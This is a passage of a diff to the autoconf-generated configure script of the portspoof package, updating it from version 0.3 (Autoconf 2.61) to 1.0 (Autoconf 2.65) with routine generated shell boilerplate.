conf$$.exe || + as_ln_s='cp -p' + elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln + else as_ln_s='cp -p' -elif ln conf$$.file conf$$ 2>/dev/null; then - as_ln_s=ln + fi else as_ln_s='cp -p' fi rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file rmdir conf$$.dir 2>/dev/null + +# as_fn_mkdir_p +# ------------- +# Create "$as_dir" as a directory, including parents if necessary. +as_fn_mkdir_p () +{ + + case $as_dir in #( + -*) as_dir=./$as_dir;; + esac + test -d "$as_dir" || eval $as_mkdir_p || { + as_dirs= + while :; do + case $as_dir in #( + *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( + *) as_qdir=$as_dir;; + esac + as_dirs="'$as_qdir' $as_dirs" + as_dir=`$as_dirname -- "$as_dir" || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + test -d "$as_dir" && break + done + test -z "$as_dirs" || eval "mkdir $as_dirs" + } || test -d "$as_dir" || as_fn_error "cannot create directory $as_dir" + + +} # as_fn_mkdir_p if mkdir -p . 2>/dev/null; then - as_mkdir_p=: + as_mkdir_p='mkdir -p "$as_dir"' else test -d ./-p && rmdir ./-p as_mkdir_p=false @@ -5421,12 +5468,12 @@ else as_test_x=' eval sh -c '\'' if test -d "$1"; then - test -d "$1/."; + test -d "$1/."; else - case $1 in - -*)set "./$1";; + case $1 in #( + -*)set "./$1";; esac; - case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in + case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in #(( ???[sx]*):;;*)false;;esac;fi '\'' sh ' @@ -5441,13 +5488,19 @@ as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" exec 6>&1 +## ----------------------------------- ## +## Main body of $CONFIG_STATUS script. ## +## ----------------------------------- ## +_ASEOF +test $as_write_fail = 0 && chmod +x $CONFIG_STATUS || ac_write_fail=1 -# Save the log message, to keep $[0] and so on meaningful, and to +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# Save the log message, to keep $0 and so on meaningful, and to # report actual input values of CONFIG_FILES etc. instead of their # values after options handling. ac_log=" -This file was extended by portspoof $as_me 0.3, which was -generated by GNU Autoconf 2.61. Invocation command line was +This file was extended by portspoof $as_me 1.0, which was +generated by GNU Autoconf 2.65. Invocation command line was CONFIG_FILES = $CONFIG_FILES CONFIG_HEADERS = $CONFIG_HEADERS @@ -5460,7 +5513,16 @@ on `(hostname || uname -n) 2>/dev/null | sed 1q` _ACEOF -cat >>$CONFIG_STATUS <<_ACEOF +case $ac_config_files in *" +"*) set x $ac_config_files; shift; ac_config_files=$*;; +esac + +case $ac_config_headers in *" +"*) set x $ac_config_headers; shift; ac_config_headers=$*;; +esac + + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 # Files that config.status was made for. config_files="$ac_config_files" config_headers="$ac_config_headers" @@ -5468,22 +5530,25 @@ config_commands="$ac_config_commands" _ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 ac_cs_usage="\ -\`$as_me' instantiates files from templates according to the -current configuration. +\`$as_me' instantiates files and other configuration actions +from templates according to the current configuration. Unless the files +and actions are specified as TAGs, all are instantiated by default. -Usage: $0 [OPTIONS] [FILE]... +Usage: $0 [OPTION]... [TAG]... -h, --help print this help, then exit -V, --version print version number and configuration settings, then exit - -q, --quiet do not print progress messages + --config print configuration, then exit + -q, --quiet, --silent + do not print progress messages -d, --debug don't remove temporary files --recheck update $as_me by reconfiguring in the same conditions - --file=FILE[:TEMPLATE] - instantiate the configuration file FILE - --header=FILE[:TEMPLATE] - instantiate the configuration header FILE + --file=FILE[:TEMPLATE] + instantiate the configuration file FILE + --header=FILE[:TEMPLATE] + instantiate the configuration header FILE Configuration files: $config_files @@ -5494,16 +5559,17 @@ $config_headers Configuration commands: $config_commands -Report bugs to ." +Report bugs to ." _ACEOF -cat >>$CONFIG_STATUS <<_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" ac_cs_version="\\ -portspoof config.status 0.3 -configured by $0, generated by GNU Autoconf 2.61, - with options \\"`echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`\\" +portspoof config.status 1.0 +configured by $0, generated by GNU Autoconf 2.65, + with options \\"\$ac_cs_config\\" -Copyright (C) 2006 Free Software Foundation, Inc. +Copyright (C) 2009 Free Software Foundation, Inc. This config.status script is free software; the Free Software Foundation gives unlimited permission to copy, distribute and modify it." @@ -5511,11 +5577,12 @@ ac_pwd='$ac_pwd' srcdir='$srcdir' INSTALL='$INSTALL' MKDIR_P='$MKDIR_P' +AWK='$AWK' +test -n "\$AWK" || AWK=awk _ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF -# If no file are specified by the user, then we need to provide default -# value. By we need to know if files were specified by the user. +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# The default lists apply if the user does not specify any file. ac_need_defaults=: while test $# != 0 do @@ -5537,34 +5604,40 @@ do -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) ac_cs_recheck=: ;; --version | --versio | --versi | --vers | --ver | --ve | --v | -V ) - echo "$ac_cs_version"; exit ;; + $as_echo "$ac_cs_version"; exit ;; + --config | --confi | --conf | --con | --co | --c ) + $as_echo "$ac_cs_config"; exit ;; --debug | --debu | --deb | --de | --d | -d ) debug=: ;; --file | --fil | --fi | --f ) $ac_shift - CONFIG_FILES="$CONFIG_FILES $ac_optarg" + case $ac_optarg in + *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + as_fn_append CONFIG_FILES " '$ac_optarg'" ac_need_defaults=false;; --header | --heade | --head | --hea ) $ac_shift - CONFIG_HEADERS="$CONFIG_HEADERS $ac_optarg" + case $ac_optarg in + *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + as_fn_append CONFIG_HEADERS " '$ac_optarg'" ac_need_defaults=false;; --he | --h) # Conflict between --help and --header - { echo "$as_me: error: ambiguous option: $1 -Try \`$0 --help' for more information." >&2 - { (exit 1); exit 1; }; };; + as_fn_error "ambiguous option: \`$1' +Try \`$0 --help' for more information.";; --help | --hel | -h ) - echo "$ac_cs_usage"; exit ;; + $as_echo "$ac_cs_usage"; exit ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil | --si | --s) ac_cs_silent=: ;; # This is an error. - -*) { echo "$as_me: error: unrecognized option: $1 -Try \`$0 --help' for more information." >&2 - { (exit 1); exit 1; }; } ;; + -*) as_fn_error "unrecognized option: \`$1' +Try \`$0 --help' for more information." ;; - *) ac_config_targets="$ac_config_targets $1" + *) as_fn_append ac_config_targets " $1" ac_need_defaults=false ;; esac @@ -5579,27 +5652,29 @@ if $ac_cs_silent; then fi _ACEOF -cat >>$CONFIG_STATUS <<_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 if \$ac_cs_recheck; then - echo "running CONFIG_SHELL=$SHELL $SHELL $0 "$ac_configure_args \$ac_configure_extra_args " --no-create --no-recursion" >&6 - CONFIG_SHELL=$SHELL + set X '$SHELL' '$0' $ac_configure_args \$ac_configure_extra_args --no-create --no-recursion + shift + \$as_echo "running CONFIG_SHELL=$SHELL \$*" >&6 + CONFIG_SHELL='$SHELL' export CONFIG_SHELL - exec $SHELL "$0"$ac_configure_args \$ac_configure_extra_args --no-create --no-recursion + exec "\$@" fi _ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 exec 5>>config.log { echo sed 'h;s/./-/g;s/^.../## /;s/...$/ ##/;p;x;p;x' <<_ASBOX ## Running $as_me. ## _ASBOX - echo "$ac_log" + $as_echo "$ac_log" } >&5 _ACEOF -cat >>$CONFIG_STATUS <<_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 # # INIT-COMMANDS # @@ -5607,7 +5682,7 @@ AMDEP_TRUE="$AMDEP_TRUE" ac_aux_dir="$ac_aux_dir" _ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # Handling of arguments. for ac_config_target in $ac_config_targets @@ -5619,9 +5694,7 @@ do "src/Makefile") CONFIG_FILES="$CONFIG_FILES src/Makefile" ;; "tools/Makefile") CONFIG_FILES="$CONFIG_FILES tools/Makefile" ;; - *) { { echo "$as_me:$LINENO: error: invalid argument: $ac_config_target" >&5 -echo "$as_me: error: invalid argument: $ac_config_target" >&2;} - { (exit 1); exit 1; }; };; + *) as_fn_error "invalid argument: \`$ac_config_target'" "$LINENO" 5;; esac done @@ -5648,7 +5721,7 @@ $debug || trap 'exit_status=$? { test -z "$tmp" || test ! -d "$tmp" || rm -fr "$tmp"; } && exit $exit_status ' 0 - trap '{ (exit 1); exit 1; }' 1 2 13 15 + trap 'as_fn_exit 1' 1 2 13 15 } # Create a (secure) tmp directory for tmp files. @@ -5659,154 +5732,139 @@ $debug || { tmp=./conf$$-$RANDOM (umask 077 && mkdir "$tmp") -} || -{ - echo "$me: cannot create a temporary directory in ." >&2 - { (exit 1); exit 1; } -} +} || as_fn_error "cannot create a temporary directory in ." "$LINENO" 5 -# -# Set up the sed scripts for CONFIG_FILES section. -# - -# No need to generate the scripts if there are no CONFIG_FILES. -# This happens for instance when ./config.status config.h +# Set up the scripts for CONFIG_FILES section. +# No need to generate them if there are no CONFIG_FILES. +# This happens for instance with `./config.status config.h'. if test -n "$CONFIG_FILES"; then + +ac_cr=`echo X | tr X '\015'` +# On cygwin, bash can eat \r inside `` if the user requested igncr. +# But we know of no other shell where ac_cr would be empty at this +# point, so we can use a bashism as a fallback. +if test "x$ac_cr" = x; then + eval ac_cr=\$\'\\r\' +fi +ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' /dev/null` +if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then + ac_cs_awk_cr='\r' +else + ac_cs_awk_cr=$ac_cr +fi + +echo 'BEGIN {' >"$tmp/subs1.awk" && _ACEOF - +{ + echo "cat >conf$$subs.awk <<_ACEOF" && + echo "$ac_subst_vars" | sed 's/.*/&!$&$ac_delim/' && + echo "_ACEOF" +} >conf$$subs.sh || + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 +ac_delim_num=`echo "$ac_subst_vars" | grep -c '$'` ac_delim='%!_!# ' for ac_last_try in false false false false false :; do - cat >conf$$subs.sed <<_ACEOF -SHELL!$SHELL$ac_delim -PATH_SEPARATOR!$PATH_SEPARATOR$ac_delim -PACKAGE_NAME!$PACKAGE_NAME$ac_delim -PACKAGE_TARNAME!$PACKAGE_TARNAME$ac_delim -PACKAGE_VERSION!$PACKAGE_VERSION$ac_delim -PACKAGE_STRING!$PACKAGE_STRING$ac_delim -PACKAGE_BUGREPORT!$PACKAGE_BUGREPORT$ac_delim -exec_prefix!$exec_prefix$ac_delim -prefix!$prefix$ac_delim -program_transform_name!$program_transform_name$ac_delim -bindir!$bindir$ac_delim -sbindir!$sbindir$ac_delim -libexecdir!$libexecdir$ac_delim -datarootdir!$datarootdir$ac_delim -datadir!$datadir$ac_delim -sysconfdir!$sysconfdir$ac_delim -sharedstatedir!$sharedstatedir$ac_delim -localstatedir!$localstatedir$ac_delim -includedir!$includedir$ac_delim -oldincludedir!$oldincludedir$ac_delim -docdir!$docdir$ac_delim -infodir!$infodir$ac_delim -htmldir!$htmldir$ac_delim -dvidir!$dvidir$ac_delim -pdfdir!$pdfdir$ac_delim -psdir!$psdir$ac_delim -libdir!$libdir$ac_delim -localedir!$localedir$ac_delim -mandir!$mandir$ac_delim -DEFS!$DEFS$ac_delim -ECHO_C!$ECHO_C$ac_delim -ECHO_N!$ECHO_N$ac_delim -ECHO_T!$ECHO_T$ac_delim -LIBS!$LIBS$ac_delim -build_alias!$build_alias$ac_delim -host_alias!$host_alias$ac_delim -target_alias!$target_alias$ac_delim -INSTALL_PROGRAM!$INSTALL_PROGRAM$ac_delim -INSTALL_SCRIPT!$INSTALL_SCRIPT$ac_delim -INSTALL_DATA!$INSTALL_DATA$ac_delim -am__isrc!$am__isrc$ac_delim -CYGPATH_W!$CYGPATH_W$ac_delim -PACKAGE!$PACKAGE$ac_delim -VERSION!$VERSION$ac_delim -ACLOCAL!$ACLOCAL$ac_delim -AUTOCONF!$AUTOCONF$ac_delim -AUTOMAKE!$AUTOMAKE$ac_delim -AUTOHEADER!$AUTOHEADER$ac_delim -MAKEINFO!$MAKEINFO$ac_delim -install_sh!$install_sh$ac_delim -STRIP!$STRIP$ac_delim -INSTALL_STRIP_PROGRAM!$INSTALL_STRIP_PROGRAM$ac_delim -mkdir_p!$mkdir_p$ac_delim -AWK!$AWK$ac_delim -SET_MAKE!$SET_MAKE$ac_delim -am__leading_dot!$am__leading_dot$ac_delim -AMTAR!$AMTAR$ac_delim -am__tar!$am__tar$ac_delim -am__untar!$am__untar$ac_delim -build!$build$ac_delim -build_cpu!$build_cpu$ac_delim -build_vendor!$build_vendor$ac_delim -build_os!$build_os$ac_delim -host!$host$ac_delim -host_cpu!$host_cpu$ac_delim -host_vendor!$host_vendor$ac_delim -host_os!$host_os$ac_delim -CC!$CC$ac_delim -CFLAGS!$CFLAGS$ac_delim -LDFLAGS!$LDFLAGS$ac_delim -CPPFLAGS!$CPPFLAGS$ac_delim -ac_ct_CC!$ac_ct_CC$ac_delim -EXEEXT!$EXEEXT$ac_delim -OBJEXT!$OBJEXT$ac_delim -DEPDIR!$DEPDIR$ac_delim -am__include!$am__include$ac_delim -am__quote!$am__quote$ac_delim -AMDEP_TRUE!$AMDEP_TRUE$ac_delim -AMDEP_FALSE!$AMDEP_FALSE$ac_delim -AMDEPBACKSLASH!$AMDEPBACKSLASH$ac_delim -CCDEPMODE!$CCDEPMODE$ac_delim -am__fastdepCC_TRUE!$am__fastdepCC_TRUE$ac_delim -am__fastdepCC_FALSE!$am__fastdepCC_FALSE$ac_delim -CPP!$CPP$ac_delim -GREP!$GREP$ac_delim -EGREP!$EGREP$ac_delim -LIBOBJS!$LIBOBJS$ac_delim -LTLIBOBJS!$LTLIBOBJS$ac_delim -_ACEOF + . ./conf$$subs.sh || + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 - if test `sed -n "s/.*$ac_delim\$/X/p" conf$$subs.sed | grep -c X` = 88; then + ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X` + if test $ac_delim_n = $ac_delim_num; then break elif $ac_last_try; then - { { echo "$as_me:$LINENO: error: could not make $CONFIG_STATUS" >&5 -echo "$as_me: error: could not make $CONFIG_STATUS" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 else ac_delim="$ac_delim!$ac_delim _$ac_delim!! " fi done +rm -f conf$$subs.sh -ac_eof=`sed -n '/^CEOF[0-9]*$/s/CEOF/0/p' conf$$subs.sed` -if test -n "$ac_eof"; then - ac_eof=`echo "$ac_eof" | sort -nru | sed 1q` - ac_eof=`expr $ac_eof + 1` -fi - -cat >>$CONFIG_STATUS <<_ACEOF -cat >"\$tmp/subs-1.sed" <<\CEOF$ac_eof -/@[a-zA-Z_][a-zA-Z_0-9]*@/!b end -_ACEOF -sed ' -s/[,\\&]/\\&/g; s/@/@|#_!!_#|/g -s/^/s,@/; s/!/@,|#_!!_#|/ -:n -t n -s/'"$ac_delim"'$/,g/; t -s/$/\\/; p -N; s/^.*\n//; s/[,\\&]/\\&/g; s/@/@|#_!!_#|/g; b n -' >>$CONFIG_STATUS >$CONFIG_STATUS <<_ACEOF -:end -s/|#_!!_#|//g -CEOF$ac_eof +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +cat >>"\$tmp/subs1.awk" <<\\_ACAWK && _ACEOF +sed -n ' +h +s/^/S["/; s/!.*/"]=/ +p +g +s/^[^!]*!// +:repl +t repl +s/'"$ac_delim"'$// +t delim +:nl +h +s/\(.\{148\}\)..*/\1/ +t more1 +s/["\\]/\\&/g; s/^/"/; s/$/\\n"\\/ +p +n +b repl +:more1 +s/["\\]/\\&/g; s/^/"/; s/$/"\\/ +p +g +s/.\{148\}// +t nl +:delim +h +s/\(.\{148\}\)..*/\1/ +t more2 +s/["\\]/\\&/g; s/^/"/; s/$/"/ +p +b +:more2 +s/["\\]/\\&/g; s/^/"/; s/$/"\\/ +p +g +s/.\{148\}// +t delim +' >$CONFIG_STATUS || ac_write_fail=1 +rm -f conf$$subs.awk +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +_ACAWK +cat >>"\$tmp/subs1.awk" <<_ACAWK && + for (key in S) S_is_set[key] = 1 + FS = "" +} +{ + line = $ 0 + nfields = split(line, field, "@") + substed = 0 + len = length(field[1]) + for (i = 2; i < nfields; i++) { + key = field[i] + keylen = length(key) + if (S_is_set[key]) { + value = S[key] + line = substr(line, 1, len) "" value "" substr(line, len + keylen + 3) + len += length(value) + length(field[++i]) + substed = 1 + } else + len += 1 + keylen + } + + print line +} + +_ACAWK +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +if sed "s/$ac_cr//" < /dev/null > /dev/null 2>&1; then + sed "s/$ac_cr\$//; s/$ac_cr/$ac_cs_awk_cr/g" +else + cat +fi < "$tmp/subs1.awk" > "$tmp/subs.awk" \ + || as_fn_error "could not setup config files machinery" "$LINENO" 5 +_ACEOF # VPATH may cause trouble with some makes, so we remove $(srcdir), # ${srcdir} and @srcdir@ from VPATH if srcdir is ".", strip leading and @@ -5823,20 +5881,128 @@ s/^[^=]*=[ ]*$// }' fi -cat >>$CONFIG_STATUS <<\_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 fi # test -n "$CONFIG_FILES" +# Set up the scripts for CONFIG_HEADERS section. +# No need to generate them if there are no CONFIG_HEADERS. +# This happens for instance with `./config.status Makefile'. +if test -n "$CONFIG_HEADERS"; then +cat >"$tmp/defines.awk" <<\_ACAWK || +BEGIN { +_ACEOF -for ac_tag in :F $CONFIG_FILES :H $CONFIG_HEADERS :C $CONFIG_COMMANDS +# Transform confdefs.h into an awk script `defines.awk', embedded as +# here-document in config.status, that substitutes the proper values into +# config.h.in to produce config.h. + +# Create a delimiter string that does not exist in confdefs.h, to ease +# handling of long lines. +ac_delim='%!_!# ' +for ac_last_try in false false :; do + ac_t=`sed -n "/$ac_delim/p" confdefs.h` + if test -z "$ac_t"; then + break + elif $ac_last_try; then + as_fn_error "could not make $CONFIG_HEADERS" "$LINENO" 5 + else + ac_delim="$ac_delim!$ac_delim _$ac_delim!! " + fi +done + +# For the awk script, D is an array of macro values keyed by name, +# likewise P contains macro parameters if any. Preserve backslash +# newline sequences. + +ac_word_re=[_$as_cr_Letters][_$as_cr_alnum]* +sed -n ' +s/.\{148\}/&'"$ac_delim"'/g +t rset +:rset +s/^[ ]*#[ ]*define[ ][ ]*/ / +t def +d +:def +s/\\$// +t bsnl +s/["\\]/\\&/g +s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ +D["\1"]=" \3"/p +s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2"/p +d +:bsnl +s/["\\]/\\&/g +s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ +D["\1"]=" \3\\\\\\n"\\/p +t cont +s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2\\\\\\n"\\/p +t cont +d +:cont +n +s/.\{148\}/&'"$ac_delim"'/g +t clear +:clear +s/\\$// +t bsnlc +s/["\\]/\\&/g; s/^/"/; s/$/"/p +d +:bsnlc +s/["\\]/\\&/g; s/^/"/; s/$/\\\\\\n"\\/p +b cont +' >$CONFIG_STATUS || ac_write_fail=1 + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 + for (key in D) D_is_set[key] = 1 + FS = "" +} +/^[\t ]*#[\t ]*(define|undef)[\t ]+$ac_word_re([\t (]|\$)/ { + line = \$ 0 + split(line, arg, " ") + if (arg[1] == "#") { + defundef = arg[2] + mac1 = arg[3] + } else { + defundef = substr(arg[1], 2) + mac1 = arg[2] + } + split(mac1, mac2, "(") #) + macro = mac2[1] + prefix = substr(line, 1, index(line, defundef) - 1) + if (D_is_set[macro]) { + # Preserve the white space surrounding the "#". + print prefix "define", macro P[macro] D[macro] + next + } else { + # Replace #undef with comments. This is necessary, for example, + # in the case of _POSIX_SOURCE, which is predefined and required + # on some systems where configure will not decide to define it. + if (defundef == "undef") { + print "/*", prefix defundef, macro, "*/" + next + } + } +} +{ print } +_ACAWK +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 + as_fn_error "could not setup config headers machinery" "$LINENO" 5 +fi # test -n "$CONFIG_HEADERS" + + +eval set X " :F $CONFIG_FILES :H $CONFIG_HEADERS :C $CONFIG_COMMANDS" +shift +for ac_tag do case $ac_tag in :[FHLC]) ac_mode=$ac_tag; continue;; esac case $ac_mode$ac_tag in :[FHL]*:*);; - :L* | :C*:*) { { echo "$as_me:$LINENO: error: Invalid tag $ac_tag." >&5 -echo "$as_me: error: Invalid tag $ac_tag." >&2;} - { (exit 1); exit 1; }; };; + :L* | :C*:*) as_fn_error "invalid tag \`$ac_tag'" "$LINENO" 5;; :[FH]-) ac_tag=-:-;; :[FH]*) ac_tag=$ac_tag:$ac_tag.in;; esac @@ -5864,26 +6030,34 @@ echo "$as_me: error: Invalid tag $ac_tag." >&2;} [\\/$]*) false;; *) test -f "$srcdir/$ac_f" && ac_f="$srcdir/$ac_f";; esac || - { { echo "$as_me:$LINENO: error: cannot find input file: $ac_f" >&5 -echo "$as_me: error: cannot find input file: $ac_f" >&2;} - { (exit 1); exit 1; }; };; + as_fn_error "cannot find input file: \`$ac_f'" "$LINENO" 5;; esac - ac_file_inputs="$ac_file_inputs $ac_f" + case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac + as_fn_append ac_file_inputs " '$ac_f'" done # Let's still pretend it is `configure' which instantiates (i.e., don't # use $as_me), people would be surprised to read: # /* config.h. Generated by config.status. */ - configure_input="Generated from "`IFS=: - echo $* | sed 's|^[^:]*/||;s|:[^:]*/|, |g'`" by configure." + configure_input='Generated from '` + $as_echo "$*" | sed 's|^[^:]*/||;s|:[^:]*/|, |g' + `' by configure.' if test x"$ac_file" != x-; then configure_input="$ac_file. $configure_input" - { echo "$as_me:$LINENO: creating $ac_file" >&5 -echo "$as_me: creating $ac_file" >&6;} + { $as_echo "$as_me:${as_lineno-$LINENO}: creating $ac_file" >&5 +$as_echo "$as_me: creating $ac_file" >&6;} fi + # Neutralize special characters interpreted by sed in replacement strings. + case $configure_input in #( + *\&* | *\|* | *\\* ) + ac_sed_conf_input=`$as_echo "$configure_input" | + sed 's/[\\\\&|]/\\\\&/g'`;; #( + *) ac_sed_conf_input=$configure_input;; + esac case $ac_tag in - *:-:* | *:-) cat >"$tmp/stdin";; + *:-:* | *:-) cat >"$tmp/stdin" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 ;; esac ;; esac @@ -5893,7 +6067,7 @@ $as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$ac_file" : 'X\(//\)[^/]' \| \ X"$ac_file" : 'X\(//\)$' \| \ X"$ac_file" : 'X\(/\)' \| . 2>/dev/null || -echo X"$ac_file" | +$as_echo X"$ac_file" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q @@ -5911,55 +6085,15 @@ echo X"$ac_file" | q } s/.*/./; q'` - { as_dir="$ac_dir" - case $as_dir in #( - -*) as_dir=./$as_dir;; - esac - test -d "$as_dir" || { $as_mkdir_p && mkdir -p "$as_dir"; } || { - as_dirs= - while :; do - case $as_dir in #( - *\'*) as_qdir=`echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #( - *) as_qdir=$as_dir;; - esac - as_dirs="'$as_qdir' $as_dirs" - as_dir=`$as_dirname -- "$as_dir" || -$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$as_dir" : 'X\(//\)[^/]' \| \ - X"$as_dir" : 'X\(//\)$' \| \ - X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || -echo X"$as_dir" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - test -d "$as_dir" && break - done - test -z "$as_dirs" || eval "mkdir $as_dirs" - } || test -d "$as_dir" || { { echo "$as_me:$LINENO: error: cannot create directory $as_dir" >&5 -echo "$as_me: error: cannot create directory $as_dir" >&2;} - { (exit 1); exit 1; }; }; } + as_dir="$ac_dir"; as_fn_mkdir_p ac_builddir=. case "$ac_dir" in .) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; *) - ac_dir_suffix=/`echo "$ac_dir" | sed 's,^\.[\\/],,'` + ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` # A ".." for each directory in $ac_dir_suffix. - ac_top_builddir_sub=`echo "$ac_dir_suffix" | sed 's,/[^\\/]*,/..,g;s,/,,'` + ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` case $ac_top_builddir_sub in "") ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; @@ -6004,12 +6138,12 @@ ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix esac _ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # If the template does not know about datarootdir, expand it. # FIXME: This hack should be removed a few years after 2.60. ac_datarootdir_hack=; ac_datarootdir_seen= - -case `sed -n '/datarootdir/ { +ac_sed_dataroot=' +/datarootdir/ { p q } @@ -6017,36 +6151,37 @@ case `sed -n '/datarootdir/ { /@docdir@/p /@infodir@/p /@localedir@/p -/@mandir@/p -' $ac_file_inputs` in +/@mandir@/p' +case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in *datarootdir*) ac_datarootdir_seen=yes;; *@datadir@*|*@docdir@*|*@infodir@*|*@localedir@*|*@mandir@*) - { echo "$as_me:$LINENO: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 -echo "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 +$as_echo "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} _ACEOF -cat >>$CONFIG_STATUS <<_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_datarootdir_hack=' s&@datadir@&$datadir&g s&@docdir@&$docdir&g s&@infodir@&$infodir&g s&@localedir@&$localedir&g s&@mandir@&$mandir&g - s&\\\${datarootdir}&$datarootdir&g' ;; + s&\\\${datarootdir}&$datarootdir&g' ;; esac _ACEOF # Neutralize VPATH when `$srcdir' = `.'. # Shell code in configure.ac might set extrasub. # FIXME: do we really want to maintain this feature? -cat >>$CONFIG_STATUS <<_ACEOF - sed "$ac_vpsub +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +ac_sed_extra="$ac_vpsub $extrasub _ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 :t /@[a-zA-Z_][a-zA-Z_0-9]*@/!b -s&@configure_input@&$configure_input&;t t +s|@configure_input@|$ac_sed_conf_input|;t t s&@top_builddir@&$ac_top_builddir_sub&;t t +s&@top_build_prefix@&$ac_top_build_prefix&;t t s&@srcdir@&$ac_srcdir&;t t s&@abs_srcdir@&$ac_abs_srcdir&;t t s&@top_srcdir@&$ac_top_srcdir&;t t @@ -6057,135 +6192,65 @@ s&@abs_top_builddir@&$ac_abs_top_builddir&;t t s&@INSTALL@&$ac_INSTALL&;t t s&@MKDIR_P@&$ac_MKDIR_P&;t t $ac_datarootdir_hack -" $ac_file_inputs | sed -f "$tmp/subs-1.sed" >$tmp/out +" +eval sed \"\$ac_sed_extra\" "$ac_file_inputs" | $AWK -f "$tmp/subs.awk" >$tmp/out \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 test -z "$ac_datarootdir_hack$ac_datarootdir_seen" && { ac_out=`sed -n '/\${datarootdir}/p' "$tmp/out"`; test -n "$ac_out"; } && { ac_out=`sed -n '/^[ ]*datarootdir[ 